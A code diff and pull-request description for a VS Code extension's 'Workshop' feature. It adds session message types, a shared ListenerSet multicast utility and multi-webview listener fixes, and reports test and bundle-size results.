+  type: MessageType.WORKSHOP_RESET_SESSION;
+}
+
+export interface WorkshopRequestSessionPayload {}
+
+/** Sent on webview mount: "give me the session as the host knows it". */
+export interface WorkshopRequestSessionMessage extends MessageEnvelope<WorkshopRequestSessionPayload> {
+  type: MessageType.WORKSHOP_REQUEST_SESSION;
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Extension → webview
+// ─────────────────────────────────────────────────────────────────────────────
+
+export interface WorkshopTurnPayload {
+  turn: WorkshopTurn;
+}
+
+/** A completed turn appended to the session (user request or finished analysis). */
+export interface WorkshopTurnMessage extends MessageEnvelope<WorkshopTurnPayload> {
+  type: MessageType.WORKSHOP_TURN;
+}
+
+export interface WorkshopSessionStatePayload {
+  session: WorkshopSessionSnapshot;
+}
+
+/**
+ * Full session snapshot. Posted in reply to WORKSHOP_REQUEST_SESSION and after
+ * host-side mutations (set-excerpt, reset, completed run) so the webview can
+ * always reconcile to the aggregate instead of accumulating drift.
+ */
+export interface WorkshopSessionStateMessage extends MessageEnvelope<WorkshopSessionStatePayload> {
+  type: MessageType.WORKSHOP_SESSION_STATE;
+}

--- a/packages/core/src/shared/types/messages/workshop.ts
+++ b/packages/core/src/shared/types/messages/workshop.ts
@@ -96,16 +96,17 @@ export interface WorkshopSetExcerptMessage extends MessageEnvelope<WorkshopSetEx
   type: MessageType.WORKSHOP_SET_EXCERPT;
 }
 
-export interface WorkshopResetSessionPayload {}
-
-export interface WorkshopResetSessionMessage extends MessageEnvelope<WorkshopResetSessionPayload> {
+/**
+ * Zero-payload messages use the house `Record<string, never>` idiom directly
+ * (9 prior siblings; PR #67 review #9) — unlike an empty interface, it
+ * actually rejects smuggled fields.
+ */
+export interface WorkshopResetSessionMessage extends MessageEnvelope<Record<string, never>> {
   type: MessageType.WORKSHOP_RESET_SESSION;
 }
 
-export interface WorkshopRequestSessionPayload {}
-
 /** Sent on webview mount: "give me the session as the host knows it". */
-export interface WorkshopRequestSessionMessage extends MessageEnvelope<WorkshopRequestSessionPayload> {
+export interface WorkshopRequestSessionMessage extends MessageEnvelope<Record<string, never>> {
   type: MessageType.WORKSHOP_REQUEST_SESSION;
 }
 

--- a/packages/core/src/utils/ListenerSet.ts
+++ b/packages/core/src/utils/ListenerSet.ts
@@ -1,0 +1,68 @@
+/**
+ * ListenerSet — the one shared multicast primitive (PR #67 review, Marcus +
+ * Parker consensus).
+ *
+ * Two webview surfaces (sidebar + Workshop) share the composition root's
+ * services, so service → webview signals fan out to per-webview listeners.
+ * The dispatch contract is subtle enough that it must not be re-typed per
+ * service (it used to exist five slightly-different times):
+ *
+ * - `add` returns an unsubscribe closure; each MessageHandler owns exactly
+ *   its registrations and releases them on dispose — one surface's teardown
+ *   can never blind the other.
+ * - `emit` iterates a SNAPSHOT (listeners may unsubscribe mid-dispatch) and
+ *   isolates each call in try/catch: one webview's throwing listener is
+ *   logged and contained, the rest keep receiving.
+ *
+ * Deliberately vscode-free and dependency-free (LogSink is a structural
+ * port), so infrastructure services and future app shells share one address
+ * for this knowledge.
+ */
+
+import { LogSink } from '@/platform';
+
+export type Listener<TArgs extends unknown[]> = (...args: TArgs) => void;
+
+export class ListenerSet<TArgs extends unknown[]> {
+  private readonly listeners = new Set<Listener<TArgs>>();
+
+  /**
+   * @param logLabel prefix for the contained-failure log line, e.g.
+   *                 `[AIResourceManager] Token usage listener`
+   * @param log      optional sink; without it failures are still contained,
+   *                 just not recorded
+   */
+  constructor(
+    private readonly logLabel: string,
+    private readonly log?: LogSink
+  ) {}
+
+  /** Subscribe. Returns the unsubscribe closure the caller MUST own. */
+  add(listener: Listener<TArgs>): () => void {
+    this.listeners.add(listener);
+    return () => {
+      this.listeners.delete(listener);
+    };
+  }
+
+  /** Fan out to every listener; a throwing listener is logged and skipped. */
+  emit(...args: TArgs): void {
+    for (const listener of [...this.listeners]) {
+      try {
+        listener(...args);
+      } catch (error) {
+        const details = error instanceof Error ? error.message : String(error);
+        this.log?.appendLine(`${this.logLabel} threw: ${details}`);
+      }
+    }
+  }
+
+  /** Drop every registration (composition-root teardown only). */
+  clear(): void {
+    this.listeners.clear();
+  }
+
+  get size(): number {
+    return this.listeners.size;
+  }
+}


### PR DESCRIPTION
Sprint 02 of the Workshop epic (ADR 2026-07-03): the Workshop gets a nervous system for **one turn**. Sprint doc: `.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md` (checkboxes ticked + in-sprint decisions recorded there).

> **Post-review addition (Okey, after a local F5 pass):** the header model chip is now the shared `ModelSelector` + `ModelBrowserModal` — the exact pair the sidebar uses (assistant scope, refresh-on-open), trigger reskinned in workshop.css. Cost: +392 bytes (the modal was already in the shared bundle). File-picker excerpt seeding from the same review is scoped into Sprint 3's doc alongside selection seeding.

## What landed

**The `workshop` domain — the 12th, wired exactly like the other 11**
- `shared/types/messages/workshop.ts`: `WORKSHOP_RUN_TOOL` / `WORKSHOP_SET_EXCERPT` / `WORKSHOP_RESET_SESSION` / `WORKSHOP_TURN`, plus a `WORKSHOP_REQUEST_SESSION` → `WORKSHOP_SESSION_STATE` snapshot pair — the reload-safety criterion needs one, and mount-request is the house idiom. `'workshop'` joins `StreamingDomain`; `ErrorSource` gains `workshop` / `workshop.run_tool`.
- `WorkshopSessionService` (application/services): pure host-side aggregate — pinned excerpt + source metadata, ordered turns, active run. Built once in `extension.ts`, shared via `CoreServices`, so the thread survives panel close/reopen and webview reloads.
- `WorkshopHandler`: routes the 14 catalog tools onto the **existing** `AssistantToolService` contracts (`dialogue`, `prose`, 12 `WritingToolsFocus` modes), streams under `domain: 'workshop'`, appends the user+assistant turn pair, posts `WORKSHOP_TURN`. A second run preempts the first (fresh turn — **no** `ConversationManager.addMessage`; continuation is Sprint 3). Reset mid-run aborts and refuses the zombie completion.
- `useWorkshop` (tripartite State/Actions/Persistence) + a live `WorkshopApp`: rail-driven excerpt pinning, enabled six-tool palette, thread renders turn pairs + `StreamingContent` for the in-flight run. Header wired for real: shared `ModelSelector`/`ModelBrowserModal` on the `assistant` scope, OpenRouter balance via `useAccountBalance`. Composer stays disabled.
- `WorkshopPanelProvider` constructs its `MessageHandler` (the one sanctioned `new`) over the injected bundle; webview boot errors still go through the shared `coerceWebviewErrorText` with the `(workshop)` surface tag — no parsing fork.

**Carried from PR #66 review (landed with this sprint)**
- #10 ErrorBoundaries around rail/thread/composer, mirroring App.tsx's tab wrapping.
- #12 Single-services witness — plus the deeper fix it exposed (below).
- #14 Scoped `:focus-visible` story in workshop.css.
- #15 CSPRNG nonce (`crypto.randomBytes`) in webviewHtml.ts; snapshot re-pinned via a crypto module mock (diff is nonce-lines-only).
- Epic Known Risks: `ConversationManager`'s raw `console.log` migrated to the injected `LogSink`.

## The load-bearing decision: two webviews, one nervous system

Tim's #12 scenario (two `AccountBalanceService`s) turned out to be the small half of a real problem: with the panel running a second `MessageHandler` over the same `CoreServices`, the single-slot callbacks (`setTokenUsageCallback`, `setStatusEmitter` ×3) meant the last-opened surface **stole** signals, and `MessageHandler.dispose()` **blinded** the surviving surface (it cleared shared callbacks and disposed the shared balance service). So:

- `AIResourceManager.addTokenUsageListener` + `addStatusListener` on AssistantTool/Dictionary/CategorySearch services — listener sets returning unsubscribes; each handler releases exactly its own registrations on dispose.
- `AccountBalanceService` lifecycle moved to `extension.ts` (`context.subscriptions`).
- Guide-loading status is gated on an active run per handler, so one surface's run can't strand ticker text in the other.
- Found along the way: `MessageHandler`'s direct AIRM status registration has been dead code since inception — `AnalysisHandler`'s emitter overwrote it ten lines later in the same constructor. Removed.
- Also new: `AnalysisHandler.dispose()` aborts in-flight runs, so closing a surface stops its token burn.

Deliberately **not** multicast: no webview cancel wire for workshop streams yet — `CancellableStreamingDomain` (`Exclude<StreamingDomain, 'workshop'>`) makes that a compile error rather than a silently dropped message until the composer sprint adds the affordance.

Smaller judgment calls (all recorded in the sprint doc): reset keeps the pinned excerpt (acceptance text clears "thread and active tool"); a missing-API-key run surfaces via the error rail instead of polluting the thread; session snapshots ride the replay cache + panel visibility flush.

## Verification

- Lint **0 errors** (warning count down 10 net), typecheck clean across all three tsconfigs.
- **57/57 suites, 462/462 tests** — 22 new (8 session aggregate, 12 WorkshopHandler incl. abort/zombie-completion paths, plus a MessageHandler-level reload-safety test: two handlers over one bundle serve the same session).
- Architecture witnesses green: forbidden-construction net (`new *Handler` in providers), plus a new witness that **every** `new MessageHandler(` in a provider takes `this.coreServices` verbatim.
- Production build + `verify:bundle` green.
- **Live F5 pass (Okey, local): panel opens, pin → run → stream works.** The remote container couldn't fetch VS Code (network policy), so the ready-made `@vscode/test-electron` smoke recipe lives in the sprint doc for future runs.

## Bundle size delta (Sprint-01 base → this PR)

| bundle | before | after | delta |
|---|---|---|---|
| `dist/webview.js` | 528,566 B | 543,608 B | **+14.7 KB (+2.8%)** |
| `dist/extension.js` | 2,230,883 B | 2,240,792 B | **+9.7 KB (+0.4%)** |

Nowhere near the entry-split threshold from the epic's risk list.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01NZNQq3YEpd3QsK95Dydbm1